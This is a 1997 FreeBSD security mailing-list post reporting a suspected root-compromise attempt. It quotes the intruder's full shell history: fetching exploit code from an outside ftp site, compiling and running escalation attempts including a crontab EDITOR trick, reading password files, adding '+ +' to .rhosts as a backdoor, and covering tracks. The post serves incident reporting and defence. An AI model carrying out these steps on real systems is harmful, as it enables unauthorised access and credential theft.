From owner-freebsd-security Fri Jun 20 09:33:38 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id JAA10958 for security-outgoing; Fri, 20 Jun 1997 09:33:38 -0700 (PDT) Received: from rosemary.fsl.noaa.gov (rosemary.fsl.noaa.gov [137.75.8.41]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id JAA10937 for ; Fri, 20 Jun 1997 09:33:26 -0700 (PDT) Received: from sage.fsl.noaa.gov (sage.fsl.noaa.gov [137.75.253.42]) by rosemary.fsl.noaa.gov (8.8.5/8.8.5) with SMTP id KAA03730 for ; Fri, 20 Jun 1997 10:33:19 -0600 (MDT) Message-ID: <33AAB0CA.2781E494@fsl.noaa.gov> Date: Fri, 20 Jun 1997 10:33:14 -0600 From: Sean Kelly Organization: CIRA/NOAA X-Mailer: Mozilla 3.0Gold (X11; I; FreeBSD 2.2-RELEASE i386) MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: Attempt to compromise root Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk I'm running FreeBSD 2.2-RELEASE. One of my users (okay, she's my wife) had submitted a crontab which had a bad MAILTO line in it, resulting in a MAILER-DAEMON message being sent to me every time the job was run ... and the job was set to run every minute: * * * * * id When I asked the her, she said she didn't know what a crontab file was. That's when I suspected foul play. The wtmp indicated that she had logged in from a remote site early in the morning when I *know* :-) she was asleep. Then we found the following in her .history file: -------------------------------------------------------------------- rm * ftp the.art.of.sekurity.org more /etc/passwd ls cc -o gr1 bsd1.c rm bsd1.c rm gr1 cc -o gr1 bsd2.c chmod 700 gr1 ./gr1 ./gr1 mary root rm gr1 ls -al cc -o gr bsd3.c chmod 700 gr ./gr ls rm bsd2.c rm bsd3.c ls rm gr cc -o gr bsd4.c ls -al ./gr rm bsd4.c gr cc -o gr bsd5.c ls -al ./gr id rm gr rm bsd5 rm bsd5.c cc -o gr bsd6.c ./gr rm bsd6.c rm gr ls -al cc -o gr bsd7.c ls -al rm bsd7.c ftp the.art.of.sekurity.org ls cc -o jump jump.c ls -al ./jump id ./jump rm * uname -a cd /bin ls -al | more ls -al | grep wheel cd .. ls -al cd etc ls -al | more more security ls -al mast* cd / cat .rhosts cd cat .rhosts ls -al ls -al | grep drwx telnet localhost 25 cd /tmp.tmp cd /tmp/.tmp ftp the.art.of.sekurity.org ls -al cc -o gr bsd1.c more bsd1.c rm gr mv bsd1.c egg.c cc -s -o /tmp/.tmp/egg -O egg.c EDITOR='/tmp/.tmp/egg -1259' export EDITOR EDITOR='/tmp/.tmp/egg -1259' e ; xport EDITOR EDITOR='/tmp/.tmp/egg -1259' ; export EDITOR more bsd1.c ls -al more egg.c crontab -e ls more egg.c EDITOR='/tmp/.tmp/egg -1259' ; export EDITOR bash whereis bash /usr/ports/shells/bash ls -al /usr/ports/shells/bash /bin/sh ls -al rm egg* pico bsd2.c more bsd2.c mv bsd2.c bsd.sh ./bsd.sh chmod 700 bsd.sh ./bsd.sh cd /tmp ls sh* cd .tmp ls -al rm bsd.sh cp bsd.one bsd.c vi bsd.c ls rm bsd.one rm bsd.c ls cc -o gr bsd3.c ls rm bsd3.c ftp the.art.of.sekurity.org ls tar xfv bsd.tar mv grind.c ohjoy.c sploit .. cd .. chmod 700 sploit chmod 644 *.c ./sploit id kill ^1 kill %1 rm ohj* rm grind* rm sploit* ls rmdir .tmp cd ls -al rm -rf /tmp/.tmp whereis larn cd /tmp mkdir tmp cd tmp ftp the.art.of.sekurity.org ls cc -o fuck bsd1.c ./fuck ls rm fuck cc -o fuck bsd2.c ./fuck rm fuck cc -o fuck bsd3.c ls ls /usr/bin/crontab ls -al /usr/bin/crontab cc -o fuck bsd4.c ./fuck ./fuck lp1 ./fuck bamboo ls rm fuck more bsd1.sh ./bsd1.sh chmod 700 bsd1.sh ./bsd1.sh more bsd2.sh chmod 700 bsd2. chmod 700 bsd2.* ./bsd2.sh ls -al rm * cd .. rmdir .tmp cd rm -rf /tmp/tmp cd /etc cat hosts cd /home ls -al cd rosemary/ ls ls -al find . -name .rhosts -print ypcat passwd w cd /etc more passwd cd /u ls -al pwd cd .. ls ls -al echo "+ +" >> .rhosts echo "+ +" > .rhosts ls -al | more exit cd /home ls cd rosemary/ ls ls -al cd ls -al | more rm .history exit -------------------------------------------------------------------- Luckily, the idiot didn't realize that the .history file is updated after logout, and we got a record of most of his/her activities. I've tried ftp'ing to the.art.of.sekurity.org and have been successful only once, but haven't been able to transfer any files. sekurity.org appears registered to a organization called "Insekurity, Inc.". I checked config files, .rhosts, system binaries, and everything seems intact, so I don't think root was compromised. However, I don't have an md5/mtree digest of everything so I'm not 100% sure. Next I'll go back to source media and do some comparisons. So, two issues: (1) Does this type of attack seem familiar? Is anyone aware of "sekurity.org" and what their purpose is? Is there someone there to whom I should complain? (Doubtful, as it appears the reason that ftp site exists is to provide a repository of cracking code.) (2) Can we get an option during the FreeBSD install to generate the md5/mtree digest? Naturally, I read up on this feature after the attack, but after an attack it's too late. -- Sean Kelly NOAA Forecast Systems Laboratory Boulder Colorado USA